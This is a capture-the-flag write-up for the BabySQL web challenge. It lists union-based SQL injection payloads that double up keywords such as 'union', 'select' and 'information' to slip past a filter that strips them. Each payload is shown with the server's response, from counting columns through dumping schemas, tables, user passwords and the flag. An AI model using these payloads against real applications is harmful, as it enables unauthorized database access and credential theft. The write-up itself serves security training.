[BUUCTF] [Geek Challenge 2019] BabySQL Writeup
0x00 test site
sql injection double write bypass
replace function, find union and select, etc. to be replaced with empty
Double writing that needs to be bypassed, split in the middle of the word, split in half, and hide a complete one inside:
union
ununionion
select
seselectlect
from
frfromom
where
whwhereere
information
infoorrmation
(过滤了or)
order
oorrder
(过滤了or)
by
bbyy
Common URL encoding
%20
空格
%23
#
%27
'
0x01 problem solving
?username=admin&password=pwd %27 or 1=1 %23
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1 ‘’ at line 1
No or, only 1=1, or is filtered
?username=admin&password=pwd %27 oorr 1=1 %23
Hello admin!
Your password is ‘09e6f2bc1ee446ef66b91bf09f58d0d4’
by is also filtered
?username=admin&password=pwd %27 oorrder bbyy 3 %23
NO,Wrong username password!!!
?username=admin&password=pwd %27 oorrder bbyy 4 %23
Unknown column ‘4’ in ‘order clause’
There are three fields
?username=admin&password=pwd ' union select 1 #
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1 ‘’ at line 1
Only talked about 1#, indicating that union and select were detected
Bypass with double writing
?username=admin&password=pwd ' ununionion seselectlect 1 #
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’ at line 1
No matter hackbar or URL box #在这里必须用URL编码成%23, otherwise it won’t work!
(I don’t understand it very well, it used to be in the url box # also ok???)
?username=admin&password=pwd %27 ununionion seselectlect 1 %23
The used SELECT statements have a different number of columns
Wrong number of columns
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23
Hello 2!
Your password is ‘3’
?username=admin&password=pwd %27 ununionion seselectlect 1,2,version() %23
Hello 2!
Your password is ‘10.3.18-MariaDB’
?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23
Hello 2!
Your password is ‘geek’
Burst library
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23
Hello 2!
Your password is
‘information_schema,mysql,performance_schema,test,ctf,geek’
Burst table
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)from(information_schema.tables)whwhereere table_schema="geek" %23
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘(infinfmationmation_schema.tables)where table_schema=“geek” #’’ at line 1
information is filtered or
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="geek" %23
Hello 2!
Your password is ‘b4bsql,geekuser’
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="ctf" %23
Hello 2!
Your password is ‘Flag’
Burst
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere
table_name="Flag"%23
Hello 2!
Your password is ‘flag’
Check the flag column of the Flag table of the ctf library
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
Hello 2!
Your password is ‘flag{d3a1f578-e00b-47d4-96b4-9535be15f9de}’
another
Burst table
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
Hello 2!
Your password is ‘b4bsql,b4bsql,b4bsql,geekuser,geekuser,geekuser’
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
Hello 2!
Your password is ‘b4bsql,geekuser’
Burst
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
Hello 2!
Your password is ‘id,username,password’
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
Hello 2!
Your password is ‘id,username,password’
?username=1&password=pwd' uniunionon selselectect 1,username,passwoorrd frfromom b4bsql %23
Hello cl4y!
Your password is ‘i_want_to_play_2077’
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23
Hello 2!
Your password is
‘1:cl4y:i_want_to_play_2077,2:sql:sql_injection_is_so_fun,3:porn:do_you_know_pornhub,4:git:github_is_different_from_pornhub,5:Stop:you_found_flag_so_stop,6:badguy:i_told_you_to_stop,7:hacker:hack_by_cl4y,8:flag:flag{d3a1f578-e00b-47d4-96b4-9535be15f9de}’